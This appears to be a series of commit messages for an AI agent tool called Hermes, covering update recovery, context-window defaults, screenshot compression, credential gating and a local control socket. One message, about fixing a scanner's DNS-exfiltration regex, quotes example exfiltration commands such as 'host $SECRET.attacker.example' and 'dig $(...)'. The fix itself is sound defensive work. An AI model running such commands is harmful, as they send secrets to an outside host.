The 85% compaction autoraise exists to stop wasting the small advertised
272K Codex window. -900k large-context picker variants (#92797) run at
~900K, where the global compression.threshold (default 50%, ~450K) is the
right behavior — autoraising them to 85% (~765K) would delay compaction
far past what the user configured.
- _is_codex_gpt54_or_gpt55() excludes valid -900k variants, so both the
85% override and the one-time autoraise notice skip those sessions.
- Base slugs are unchanged: 272K window + 85% autoraise.
- Tests: variant/base threshold pairs incl. namespaced ids; docs note in
the -900k section.
Review pass findings on the force_jpeg change:
- Broaden the JPEG mode guard from {RGBA, P} to 'not in {RGB, L}':
force_jpeg newly routes PNG inputs to the JPEG encoder, and an
LA-mode PNG (grayscale+alpha) would crash img.save() with
'cannot write mode LA as JPEG'.
- browser_use_cli's _native_screenshot_result is the THIRD native
history-embed site: it baked the data URL into a _multimodal tool
result with the 5 MB one-shot default and no dimension cap. Apply
the same 256KB/1568px/force_jpeg history-reuse policy as the two
sites already migrated.
PNG has no quality ladder, so a text-dense screenshot over the 256KB
history-embed cap (#92699 / #92783) could only shrink by halving
dimensions — 1568px dropped to ~784px and on-screen text became
unreadable, the exact fidelity screenshot QA depends on.
Add force_jpeg to _resize_image_for_vision: the two history-embed call
sites (vision_analyze native, browser_vision native) re-encode
resize-needing screenshots as JPEG so the quality ladder (85/70/50)
absorbs the byte pressure and the readable resolution survives.
Under-cap images are untouched and stay PNG; one-shot/reactive paths
keep their existing format behavior.
Flagged during the #92783 salvage review.
The demote pass (pass 2) and the retire pass (3.5, #92783) each carried
their own copy of the two image-strip branches. The copies had already
diverged: the retire pass dropped the stale api_content sidecar on
rewrite, the demote pass did not — leaving an exact-wire sidecar that
replay could use to resend the pre-strip image bytes.
Extract _strip_images_from_tool_msg as the single policy owner; both
passes now use it, closing the sidecar gap in the demote path.
Sibling-test blast radius from #92617: the salvaged fixture's fake
_run_quarantined_install predates the strict_quarantine kwarg the
update sync now passes.
- _is_uv_command: detect 'python -m uv'/'python -m uvx' and launcher
wrappers, not just a uv basename (review: naive check missed module form)
- _insert_python_pin: never duplicate a caller-supplied --python (review:
last-wins ambiguity)
- _interpreter_scripts_dir: when pinning to sys.executable on Windows with
no project venv, quarantine the running interpreter's Scripts dir so the
hermes.exe shims uv rewrites are actually unlocked (review: quarantine
path diverged from pinned interpreter)
- tests: rewritten to repo English convention; added python -m uv,
--python-guard and Windows quarantine-target cases (5 total)
When Hermes is installed via pip / site-packages (e.g. the Windows
installer), PROJECT_ROOT is the interpreter's site-packages directory and
PROJECT_ROOT/venv is never created. The update and interrupted-install
recovery paths still set VIRTUAL_ENV=PROJECT_ROOT/venv, so uv fails with
'Failed to inspect Python interpreter from active virtual environment'
before installing anything — leaving the install partially updated.
Detect the nonexistent VIRTUAL_ENV in the shared dependency-install helper
and pin uv to the running interpreter (uv pip install --python
sys.executable) instead, matching the fix already applied to lazy-deps
(#83335) and the ZIP update path (#71510).
Connections ARE the peer set: every gateway connected to the Desktop
(local, remote URL, SSH, Hermes Cloud, docker) is now message_agent-
reachable. The Desktop relays over the persistent sockets it already
holds — roster sync per connection, envelope drain/deliver/reply loops —
so cross-connection DMs work exactly like local ones, replies included.
Also fixes the legacy-SOUL gate bug: profiles whose SOUL.md carries the
old plugin-appended protocol silently lost the message_agent tool
because the injection/execution gates keyed on protocol-section
non-emptiness instead of managed-install.
Review findings on #92797 (@100yenadmin):
- is_codex_900k_base() is now the single source of truth used by picker
synthesis, context resolution, /model validation, and wire stripping.
Eligibility is an exact table (sol/terra/luna, gpt-5.4, daybreak alias)
plus date-shaped 5.6 snapshots — family-prefix matching removed, so
non-routable -pro slugs and unknown descendants never gain variants.
- strip_codex_context_variant_suffix() strips conditionally: ineligible
aliases (gpt-5.5-900k) are returned unchanged and fail honestly at the
API instead of silently running as the base model at 272K.
- validate_requested_model() rejects ineligible *-900k aliases before the
hidden-slug soft-accept, and accepts valid variants missing from a
stale catalog without letting the typo auto-corrector eat the suffix.
- Codex context resolver drops vendor/ namespaces, so
openai/gpt-5.6-sol-900k resolves to 900K like the bare id.
- Table-driven regression covering eligible bases/snapshots/namespaced
ids and rejected -pro/-mini/5.5/unknown aliases, asserting context AND
wire model.
The Aug 16 change that auto-raised gpt-5.4/5.6 Codex OAuth context to the
live-verified 900K burned through subscription usage for users who never
asked for the larger window (bigger window = more input tokens per request).
- Base Codex slugs (gpt-5.6-sol/terra/luna, gpt-5.4) now resolve to the
advertised 272K again — the cheaper limit is the default.
- The model picker synthesizes explicit <slug>-900k variants (e.g.
gpt-5.6-sol-900k) for every live-verified slug; selecting one opts into
the 900K window. Slugs that genuinely enforce 272K (gpt-5.5,
gpt-5.4-mini) get no variant.
- The -900k suffix is Hermes-side only: stripped before the model id hits
the wire (main transport + auxiliary Responses adapter), and pricing
aliases the variants onto the base entries.
- Docs: new opt-in section in context-compression-and-caching.md.
On Windows the updater renames the live `hermes*.exe` shims aside
(`hermes.exe.old.<unix-ms>`) so uv can write replacements. When that quarantine
succeeds but the install then fails, the recovery path could leave the install
with no `hermes` on PATH at all — unrecoverable in place, because the command
that would repair it IS `hermes update` (#75584).
Restoring a quarantined shim happens at three sites: the updater, the
early-recovery installer, and the startup sweep's orphan rescue. Each was a
single un-retried rename whose OSError was swallowed in silence, while the
OUTBOUND quarantine rename already retried a lock. That is backwards — a failed
quarantine merely aborts an update, a failed restore removes `hermes` from
PATH — and the two sites that had messages had already drifted apart.
- `_early_recovery.restore_quarantined_shims()` is now the single
implementation: retry ladder, one recovery message, returns the pairs it
could not restore. It lives in the stdlib-only module that both `main` and
`_install_repair` already import, so the layers cannot drift again. A pair is
not a failure when the original reappeared or the quarantine file vanished —
two processes sweeping the same orphan must not produce a spurious error.
- `_cleanup_quarantined_exes` unlinked every `*.exe.old.*` on each invocation.
When the original shim was already missing, that .old file was the ONLY
surviving copy — deleting it converted a one-rename recovery into a full
reinstall. It now rescues the orphan through the shared helper instead, and
leaves anything inside a 15-minute grace window alone so it cannot destroy a
concurrent update's in-flight quarantine.
- Ordering is by the PARSED `.old.<unix-ms>` stamp, not the raw filename.
Lexicographic ordering only tracks recency while every stamp shares a digit
width; a stray `.old.999` sorts above a 13-digit epoch-ms stamp and would be
the copy rescued onto the live shim name.
- Names whose suffix does not parse as int-ms are not ours: never rescued,
never deleted. The sweep should not destroy files whose provenance it cannot
establish, and they are not produced by the quarantiner.
The stamp is read from the filename rather than st_mtime because `rename`
preserves the original shim's mtime, which records when uv wrote the shim —
days earlier, in general — not when it was quarantined. A regression test pins
that distinction.
Messages go to stderr: the sweep runs on EVERY hermes invocation and
`hermes acp` speaks JSON-RPC on stdout.
Scope note: `_quarantine_running_hermes_exe` is deliberately byte-identical to
main here. Why the outbound rename fails in the first place (the launcher
holding its own image without FILE_SHARE_DELETE) is #88121's subject; this is
the net underneath, covering the case where quarantine SUCCEEDS and the install
dies afterwards. The two touch disjoint functions and can merge in either order.
Reproduced and verified on Windows 11 (26200), Python 3.11.15: stranded the
shims, confirmed a normal `hermes` invocation now rescues the orphan instead of
deleting it, and confirmed an exhausted rescue prints the recovery command.
16 new tests; 35 pass across the four quarantine suites.
CPython interns identifier-like string literals, so 'is' cannot
distinguish an import alias from a copy-pasted literal (verified:
two exec'd namespaces each defining the literal share one object).
The equality assertions three lines above are the full honest guard.
Also reword a comment: raw == is marker-SENSITIVE, not asymmetric.
Review-pass follow-up on the load-time durability stamp:
- hermes_state.py: import the marker from agent.context_compressor instead
of a third synced literal (hermes_state already imports agent.* at module
level; only run_agent is circular). Old comment claimed otherwise.
- agent/turn_finalizer.py: replace the raw "_db_persisted" string at the
fill-empty-tail pop site with the shared constant (was outside the drift
guard).
- agent/conversation_compression.py: the no-op progress check now falls back
to a marker-insensitive comparison (_strip_marker_for_comparison). Loaded
rows are stamped at materialization time while compress() output is
marker-swept, so a semantically-identical no-op copy on a cold-resumed
session would previously compare unequal and take the progress branch.
Raw == still runs first so engine-returned list subclasses keep their
__eq__ semantics.
- test_marker_constant_in_sync extended to turn_finalizer + identity
assertions; new test_noop_progress_check_is_marker_insensitive
(mutation-checked: fails when the helper is neutered).
Resumed sessions loaded message dicts from state.db WITHOUT the
_DB_PERSISTED_MARKER, so any flush that lost the identity boundary
(compression durable-snapshot adoption, incremental tool-call persists,
rotation preflight on cold resume) re-appended the ENTIRE loaded
transcript as new rows. Compression cycles then doubled the copies:
the incident session grew 998 -> 1995 -> 3990 -> 7981 rows across
three aborted rotations (15,962 active rows, only 472 distinct).
Fix at the architectural chokepoint: SessionDB._rows_to_conversation
(shared by get_messages_as_conversation and get_resume_conversations)
now stamps the marker at row materialization time - a dict built FROM
a durable row is persisted by construction, regardless of which caller
loads it or how the list is later handed to a flush.
Safety:
- Wire-safe: every transport strips underscore-prefixed keys before
the API request (chat_completion_helpers, anthropic_adapter), same
contract as the existing _row_id stamp in the same function.
- Rotation handoffs still write: compression's assembly copies strip
the marker (_fresh_compaction_message_copy + the terminal
_strip_persistence_markers sweep), so compacted transcripts still
flush to the child session (#57491 invariant preserved).
- Branch/seed copies unaffected: /branch and _persist_branch_seed
build fresh field-projected dicts and write via append_messages_batch
directly, not through the marker-gated flush.
Tests: new regression suite (marker sync, load stamping, 3-cycle
amplification repro, new-tail write guard, compaction-copy handoff);
updated the #68454 control test that asserted the old double-write
behavior and the ACP restore shape test.
browser_vision's native fast path base64-encoded screenshots at full
resolution and baked them into the tool result uncapped — the exact
sibling of the vision_analyze path #92699 fixed. Apply the same
proactive 256KB/1568px resize before the embed enters reusable history.
Fail-open by design: without Pillow the resize helper falls back to raw
bytes and the compressor's keep-newest pass still retires stale embeds.
Sibling-gap follow-up for the #92725 salvage; the shared-cap approach
mirrors the policy-owner idea from #92748.
Co-authored-by: joaomarcos <joaomarcosdias444@gmail.com>
Images locked in protect_last_n never shrank, so compression savings
stayed under 10% and anti-thrash disabled further compaction. Keep the
newest three tool-result screenshots live for follow-up QA and replace
older native embeds with placeholders.
vision_analyze baked up to 4 MB / 7900px screenshots into immutable
history, so every later turn re-sent ~400K chars. Cap embeds at 256 KB
and 1568px (the long edge models actually read) so screenshot QA no
longer blows the context.
Desktop writes backend.lock.json only after a remote profile backend announces readiness. Concurrent Bot Mode profile starts could therefore see their young siblings as unowned PPID-1 processes and mutually reap them, causing SSH reconnect storms and stale turn leases.\n\nProtect unregistered backends for a bounded startup grace period, fail closed when age cannot be read, and cover young, unknown-age, boundary, lock-owned, and old-orphan behavior.
Builds on @mrsucesso's durable-marker recovery (previous commit):
- GET /api/hermes/update/receipt — the full durable receipt (steps,
skips, gateway restart outcome, fleet matrix) + compact summary; the
authoritative update-outcome record (written by every run since
#91283, including refused/failed).
- /api/actions/hermes-update/status now attaches the receipt summary,
and when BOTH the in-memory registries and the update.log marker are
gone (dashboard restarted + log rotated — the #81193 state), a
finished receipt reports the outcome: success→0, partial→1. A
still-running receipt proves nothing (clients keep polling).
- Desktop (updates.ts): the apply poll reads the attached receipt — a
finished receipt whose run started at/after this apply is
authoritative, replacing timeout-based failure inference across the
update's restart gap ('Backend update failed' on successful updates,
#81193; 'boot failed' during update restarts, #87359).
Live-verified: real uvicorn server + real UpdateReceipt writer (the
exact code hermes update runs) over real HTTP — receipt endpoint 200
with summary; #81193 state (no registries, no marker) reports success
from the receipt alone; partial receipt with a DOWN fleet row maps to
exit 1 (no false success).
Persisted update completion markers survive the dashboard restart that clears in-memory action state. Recover the latest safe marker from update.log so remote Desktop clients do not report a successful backend update as failed.
The salvaged test drove the FULL post-update pipeline against the real
dev box: real fleet probes read live gateways as STALE (exit 1) and the
restart phase tripped the live-system guard on a real gateway PID. Pin
empty fleet/gateway discovery and make _reload_updated_runtime_modules
(the proof the post-update path ran — the bug returned before it) abort
the pipeline. Sabotage-verified: disabling the hoisted sync fails the
test.
On a fork, `hermes update` compares HEAD against origin/main, and only then
syncs the fork from upstream — inside the `commit_count == 0` branch, which
returns immediately afterwards. So an update that pulls hundreds of commits
from upstream prints "Already up to date!" and skips everything the
post-update path does, including the dependency sync and the gateway restart.
Observed on a fork-based deployment: 1654 commits pulled, "Already up to
date!", and the launchd gateway left running. It then held pre-update modules
in memory while lazily importing post-update ones, and failed later with an
AttributeError for a method that plainly exists on disk — a mixed runtime that
looks nothing like an update problem. Correlating every run in update.log, a
restart happened on exactly the runs that pulled upstream *without* also
claiming to be up to date, and never once they started co-occurring.
Decide before the branch: capture HEAD, sync, and if HEAD moved, set
commit_count from the range so the normal post-update path runs. The pull that
follows is a no-op (the sync updates origin too); reaching the restart is the
point. commit_count is floored at 1 — HEAD moving *is* the update, so a failed
or zero count query must not send us back down the early return.
steps still being skipped afterwards.
Refs #73108
Phase-1 verification gap (#91277, found auditing our own landed matrix
against the mapped issues): collect_fleet_versions only listed gateways
with a LIVE pid, so 'restart stopped it and nothing came back' produced
NO row at all — the exact silent-failure shape the matrix exists to
catch (#88848/#74973 class) passed with exit 0.
- collect_fleet_versions(pre_restart_pids=...): a dead pid becomes a
'down' row only when it was alive at update start AND its runtime
status still claims a running state. Rollout-safe: no snapshot (old
callers), clean stops, startup failures, and stale records from
long-dead gateways keep the historical no-row behavior.
- print_fleet_version_matrix escalates on down rows like stale ones
(exit 1) with the per-profile restart remediation.
- cmd_update passes its existing pre-restart PID snapshot.
Sabotage-verified (reverting the membership check fails the new test);
live-verified with a real spawned-then-killed process producing the
DOWN row and matrix escalation.
Address review feedback: the gate reused has_vertex_credentials(), which also
returns True for an ambient GOOGLE_APPLICATION_CREDENTIALS path. That var is
commonly set globally for unrelated GCP work, so a user who never configured
Hermes for Vertex would see it in the explicit-only picker and could spend
against those credentials — weakening the explicit-configuration guarantee the
gate documents (mirrors the existing _IMPLICIT_ENV_VARS carve-out).
Add has_explicit_vertex_config() in agent/vertex_adapter.py that checks only
Hermes-scoped signals — VERTEX_PROJECT_ID / vertex.project_id (project
override) or a resolvable VERTEX_CREDENTIALS_PATH — and NOT
GOOGLE_APPLICATION_CREDENTIALS. Route the auth gate through it.
Adds a regression test asserting an ambient GOOGLE_APPLICATION_CREDENTIALS
path alone does not mark Vertex explicit, and updates the existing test to
drive the real config signal instead of mocking has_vertex_credentials().
is_provider_explicitly_configured() only checked provider env vars for
auth_type="api_key" providers. Bedrock is registered with
auth_type="aws_sdk" and an empty api_key_env_vars tuple, so a user who
sets AWS_BEARER_TOKEN_BEDROCK (or an AWS_ACCESS_KEY_ID +
AWS_SECRET_ACCESS_KEY pair) in .env was never counted as having
explicitly configured the provider.
Symptom: the desktop model picker (and any consumer of
build_models_payload(explicit_only=True)) silently hid the Bedrock row
even though list_authenticated_providers had discovered credentials and
built a full model list for it. Reproduced on main:
build_models_payload(ctx, explicit_only=False)
-> ['moa', 'nous', 'bedrock', ...] # row exists, 132 models
build_models_payload(ctx, explicit_only=True)
-> ['nous', ...] # bedrock filtered out
Fix: aws_sdk-type providers now count as explicitly configured when
Bedrock-relevant env credentials are present. Deliberately env-var-only:
ambient sources (AWS_PROFILE / SSO, EC2 IMDS, container credentials)
still do NOT auto-surface, consistent with the gate's purpose (#56974)
and with a lone AWS_ACCESS_KEY_ID (no secret) not counting.
Tests: six behavior-contract cases in test_auth_provider_gate.py
covering bearer token, key pair, lone key id, ambient AWS_PROFILE,
no-credential baseline, and non-leakage into other providers.
The salvaged carve-out covered the PKCE file and Claude Code credentials
but missed the canonical wired-token location — auth.json
credential_pool.anthropic oauth entries. Discovery accepts those via
pool.has_credentials(), so the filter must too. Read-only dict access;
api_key pool entries intentionally stay excluded (E2E case 4).
The desktop explicit-only picker filter drops any provider row where
is_provider_explicitly_configured() is False. That gate only recognizes
active_provider, model.provider, and API-key env vars — so a user who
authenticated Anthropic via OAuth (Hermes device flow or Claude Code
~/.claude/.credentials.json) had the Anthropic row silently hidden from
the desktop model picker even though list_authenticated_providers()
accepted those same credentials when building it (model_switch.py has an
equivalent special-case in its discovery path).
Unlike ambient CLI tokens (gh -> copilot), an OAuth access token only
exists after an interactive login, so its presence is deliberate user
configuration. Add a narrow carve-out for the anthropic slug that keeps
the row when either OAuth reader finds an accessToken; the strict gate
still governs every other provider, and is_provider_explicitly_configured
itself stays untouched so PR #4210's consent guard for auxiliary tasks
keeps its current behavior.
Follow-ups on top of the salvaged #92665 commits, closing the two gaps
called out in #92647:
- SEARXNG_URL / CAMOFOX_URL now count as direct web/browser configuration
in _get_gateway_direct_credentials(), so env-only keyless local setups
are offered unchecked instead of pre-checked.
- Submitting the checklist with unconfigured tools left unchecked records
them in tool_gateway_declined_tools (new known root key) and stops
pre-checking them on subsequent Nous model swaps; opting in later clears
the decline. Cancel (Ctrl-C/ESC) records nothing.
- has_direct labels mention SearXNG/Camofox when that's what's detected.
- Docs: tool-gateway.md gains an enablement-checklist section.
The early "fail closed" returns (account fetch error, not entitled,
non-nous provider) still returned 3-element tuples after the function's
happy path and every caller moved to a 4-tuple, crashing
prompt_enable_tool_gateway with ValueError for any logged-in Nous
account that isn't paid or pool-entitled — the common case, hit
unconditionally from `hermes model`.
get_gateway_eligible_tools() classified a tool as "unconfigured" whenever
it found no direct API-key credential, ignoring an explicit non-nous
selection already stored in config (e.g. web.backend: searxng, a keyless
self-hosted backend). Every unconfigured tool is pre-checked in the
`hermes model` Tool Gateway checklist, so a single Enter during Nous model
setup silently rewrote web.backend (and similarly browser.cloud_provider,
tts/stt/image_gen.provider) to "nous" for users who had deliberately
configured a keyless local backend.
get_gateway_eligible_tools() now also resolves each tool's stored
selection via the existing _selected_provider() helper and routes an
explicit non-nous selection into a new explicit_configured bucket instead
of unconfigured. prompt_enable_tool_gateway() never offers those tools,
so they can no longer be pre-checked or accidentally overwritten.
Fixes#92647
On top of @686f6c61's premise-corrected #76745:
- _looks_like_desktop_control_plane now uses the parser-derived
_hermes_holder_subcommand instead of substring matching — the
#90778/#91869 class ('-m dashboard chat' and 'kanban --preserve-cache'
argv no longer read as control planes). Regression test added,
sabotage-verified (reverting to substrings fails it).
- Live E2E (this host, real processes + real spawn ledger): live
supervised serve owns lifecycle; killed spawner (orphan) does not;
dead serve entry excluded; empty ledger does not.
- Live Windows E2E for the wine2e lane: real self-registered ledger
entry suppresses the actual cold-start plan; dead serve restores it;
holder-scan fallback rung proves the token classifier live.
Co-authored-by: 686f6c61 <github@00b.tech>
Vestigial autostart is not proof the user wants a standalone gateway
run. When Desktop currently supervises this install's control plane,
the updater must not spawn a competing messaging daemon. Serve is not
treated as gateway-equivalent.
Both failed only in the full Linux suite, which the targeted local
battery never ran:
- test_update_zip_two_phase.py's AST guard (#76105) flags any code
literal "Scripts" in hermes_cli as an open-coded venv layout.
migrate_windows_bin_path's legacy PATH key now derives it via
venv_bin_dir(root / "venv", windows=True) — same value, canonical
helper. The literal `venv` component stays: the key must match what
the pre-#83797 installer wrote to the registry, not where the venv
lives now.
- The managed-bin marker tests built expected PATH entries from
tmp_path, so on a POSIX host they compared forward-slash strings
against the backslash markers and could never match. Markers match
Windows registry PATH entries, so the tests now feed Windows-shaped
literals — host-independent, same contract.
CI flake mechanism (PR #92617 red, reproduced standalone): tests plant
fake botocore modules via patch.dict; when the REAL botocore.exceptions
is first imported in an interpreter state where a fake parent is (or
was) installed, its 'from botocore.vendored import requests' resolves
against a module with no __path__ and every exception test in the worker
dies with "No module named 'botocore.vendored'" — ordering-dependent,
so green locally, red in CI workers.
Defenses (both, in depth):
- test_bedrock_adapter.py pre-imports the real botocore.exceptions at
module scope, before any test can stub sys.modules — later imports are
cache hits that can never re-execute the vendored import under a
poisoned parent. Proven standalone: fake-parent repro fails without
the pre-import, succeeds with it.
- autouse _boto_sys_modules_hygiene fixtures in all three files that
plant fake boto* modules (adapter, integration, model-picker):
snapshot every boto* sys.modules entry before each test, evict+restore
after — no stub window can leak state into a later test regardless of
worker ordering.
- importorskip targets botocore.exceptions (the module the tests
actually need) instead of bare botocore, so a torn install skips
instead of erroring.
148/148 across the four affected suites.
The #87331 remaining half: when hermes.exe (or a sibling shim) could not
be renamed aside, the updater printed a warning and ran the installer
anyway — which died partway on the same locks and stranded the venv
between versions.
- _run_quarantined_install gains strict_quarantine: any shim whose
rename failed every retry aborts BEFORE the install command runs
(successful renames rolled back), raising ShimQuarantineError.
- The update dependency sync passes strict_quarantine=True. The update
boundary turns the error into a refusal: defer via the
update-incomplete marker, exit 2 (recorded as refused by the receipt
net), never ZIP-fallback. Post-sync repair installs keep warn-and-try
(their venv is already mutated; refusing buys nothing).
- The recovery installer (_install_repair._run_install_cmd) is strict
unconditionally: marker survives, next launch retries after the
holder exits.
- Live Windows E2E for the wine2e lane: a real child holds hermes.exe
without FILE_SHARE_DELETE (the exact field lock shape), strict path
refuses with zero installer invocations, releases roll back, and the
same path proceeds once the holder exits.
Sabotage-verified: reverting the strict wiring makes both fail-closed
tests fail.
PR #92092 fixed the same vanished-launcher bug by restoring copies into
the legacy in-checkout hermes-agent\bin from the update tail. That
location is what this branch removes: untracked files there are swept
by the update autostash on every cycle (restore/sweep treadmill, plus a
parked stash entry per update under --keep-stash), and unconditional
exe copies break on relocatable venvs ('uv trampoline failed to
canonicalize script path'). This branch's managed-binary-dir layout
supersedes both mechanisms, so the merge resolves to it:
- drop _sync_windows_cli_launchers and its _ensure_acp_launcher call
(Windows staging/repair lives in ensure_windows_bin_launchers at
process start and migrate_windows_bin_path in the update tail);
_ensure_acp_launcher is a Windows no-op again
- keep #92092's genuinely better installer semantics: staging stays in
a dedicated Install-HermesCommandLaunchers function that throws
BEFORE any PATH mutation when the required launcher cannot be staged
and verified -- previously Set-PathVariable could put an empty dir on
PATH and still print 'hermes command ready'. Reworked for this
branch's layout: caller passes the destination ($HermesHome\bin),
launcher form follows the venv (exe copy vs .cmd delegator), and the
verify step accepts either form
- rework #92092's AST-lifted PowerShell test for the new function
signature, keeping its fail-before-PATH-mutation assertions and
adding relocatable-venv form-selection coverage
- drop tests/hermes_cli/test_windows_cli_launcher_repair.py (pinned the
superseded in-checkout mechanism; equivalent and broader coverage
lives in tests/hermes_cli/test_ensure_windows_bin_launchers.py)
- bind under umask 0o177 so the socket is never world-connectable, even
pre-chmod (review pt 3)
- verb handlers run in an executor: state-file reads stay off the
adapter event loop (pt 2)
- inventory dedupes one multiplex gateway answering identify for several
homes — one runtime record per pid, with regression test (pt 1)
- v1 wire contract (one request per connection) documented in the module
docstring (pt 5); /tmp-unwritable skip in the short-home test
Live-verified: perms 600 at bind, identify 4.3ms via executor path, 20
rapid queries healthy.
First windows-latest run proved the design premise in miniature: identify
answered pid 616 while Popen.pid said 8000 — uv's Windows python.exe is a
trampoline that spawns the real interpreter as a child, so the spawner's
PID view is wrong and the process's self-declaration is right. Assert
against the child's printed os.getpid(); use taskkill /T for teardown.
CI runners put pytest tmp roots past sun_path, which routed every test
home through the fallback: two tests assumed in-home binding. Tests now
assert against the resolved bind location, and the fallback itself
prefers /tmp when tempfile.gettempdir() is too deep to fit sun_path.
Real child process binding the real pipe via the proactor loop with the
default handlers; real sync client; real collect_fleet_versions consumer;
kill-and-fallback proof. Skipped everywhere except a real Windows host.
The gateway now creates a local control socket at startup (Unix domain
socket at $HERMES_HOME/gateway.sock with a pointer-file fallback for
long paths; named pipe on Windows) and answers versioned JSON verbs:
- identify: pid, profile, hermes_home, code_sha/code_version (#91283
stamps, now queryable live), self-declared supervisor kind, start_time
- status: the live runtime-status payload, answered by the process itself
Bound immediately after the PID-file O_EXCL claim (the moment the
process becomes the authoritative gateway for its HERMES_HOME), removed
on clean shutdown; a successor clears any stale socket on bind. Strictly
non-fatal: bind failure only means consumers use the old path.
Consumers migrated (observability only, scan layer demoted to fallback,
never deleted):
- collect_fleet_versions() (post-update fleet matrix): prefers a live
identify answer over gateway_state.json; entries carry source=socket
- collect_runtime_inventory() (hermes update --plan): prefers the
socket, and takes the gateway's own supervisor declaration instead of
inferring it from PID scans
Old gateways mid-upgrade, crashed processes, and bind failures behave
exactly as before. Never a TCP port; filesystem/pipe ACLs are the auth
boundary (0600 socket).
Part of #91277 (fleet-update reliability). Design: #92091.
The PR narrowed _is_fts_write_corruption_error to only match FTS5-specific
'fts5: corrupt structure record' errors, dropping the generic 'database disk
image is malformed' match. But FTS shadow table corruption (the common case)
raises the generic error on SQLite < 3.53, not the FTS5-specific one. This
broke FTS self-heal for 10 existing tests and for users on older SQLite.
Restore the generic match via is_malformed_db_error. Safety is preserved
because the FTS rebuild only touches derived indexes — if the damage is
actually in a canonical B-tree, the rebuild itself fails and the write
propagates.
Also restore the original test assertion and remove the
test_generic_malformed_write_fails_closed test whose premise (generic
corruption should not trigger FTS rebuild) was wrong for the FTS self-heal
path.
The dns_exfil pattern matched the 'host' DNS command inside flag names
like llama.cpp/vllm's --host 127.0.0.1 --port $PORT, so any plugin
shipping a .sh launcher script was blocked as dangerous. A negative
lookbehind (?<![-/]) excludes flag/path contexts while real DNS-lookup
exfiltration (host $SECRET.attacker.example, nslookup $X, dig $(...))
still trips the pattern.
Salvaged from PR #92382 (regex fix + regression test); scan-scoping
half rejected separately.
os.geteuid() does not exist on Windows, so collecting the module
crashed with AttributeError before any test ran. Branch on
hasattr(os, "geteuid") the same way the code under test does.